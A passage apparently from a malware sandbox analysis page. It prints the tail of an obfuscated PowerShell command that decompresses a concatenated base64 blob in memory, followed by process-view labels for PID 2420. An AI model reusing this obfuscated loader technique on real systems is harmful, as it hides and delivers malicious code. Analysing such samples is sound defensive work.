5uRrSQchR3zAGH4AV0z6NROV4VqAWkTXz/bvC+qHxjBivtYQWjpMFZkAYKPV50jo8drLq3eFUamha+hBYkjgi{2}FonNNec74gx7snukdZ56Fz7fiLbW7+ZOnXoS1ceBfWnppIvn'+'Z1NwEvIoJT'+'fp'+'SsSBWJRNO8rpgntwLw3q2m2vP1{1}Nl/ttL21ouwoEp1H8{1}w1{2}xbpXNG0348YPB0EFLHXMXsNPjh7CWUHiuC+GkgQLc7Zcwj3N3vkwwsAAbk{1}XH4qnw2SKW{2}giKwBBtlSn7foArkYk+vfS5+srC3gn/9v9Hla+4fdN1HKLKYA/bL6cuFZO/iNCAwxFS{'+'2}pQnVmZP9aOAxEljLPgpzGBxJing35jL7eiKM2PMrSHvE3jGvtwcELAAA{0}')-f'=','y','D')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

            2420

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf